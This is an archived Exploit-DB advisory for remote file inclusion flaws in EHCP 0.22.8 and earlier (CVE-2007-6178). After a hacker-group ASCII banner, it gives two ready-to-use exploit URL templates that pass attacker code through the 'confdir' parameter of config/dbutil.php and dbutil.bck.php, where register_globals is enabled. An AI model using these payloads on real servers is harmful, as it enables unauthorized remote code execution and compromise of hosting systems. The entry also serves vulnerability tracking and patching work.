EHCP <= 0.22.8 - Multiple Remote File Inclusion Vulnerabilities

2007-11-28T00:00:00
ID EDB-ID:4671
Type exploitdb
Reporter MhZ91
Modified 2007-11-28T00:00:00

Description

EHCP <= 0.22.8 Multiple Remote File Inclusion Vulnerabilities. CVE-2007-6178. Webapps exploit for php platform

                                        
                                            ---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  &lt;_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  &gt;__|            |___||__|  
          \/\______|      \/     \/                           
---------------------------------------------------------------

Http://www.inj3ct-it.org	    Staff[at]inj3ct-it[dot]org	

---------------------------------------------------------------

	  Multiple Remote File Inclusion

---------------------------------------------------------------

# Author: MhZ91 nobody.91@hotmail.it 

# Download Script: http://sourceforge.net/projects/ehcp

# register_globals = On 

# Exploit 

# http://[site]/[path]/config/dbutil.bck.php?confdir=[Evil_Code]

# http://[site]/[path]/config/dbutil.php?confdir=[Evil_Code]

---------------------------------------------------------------

# milw0rm.com [2007-11-28]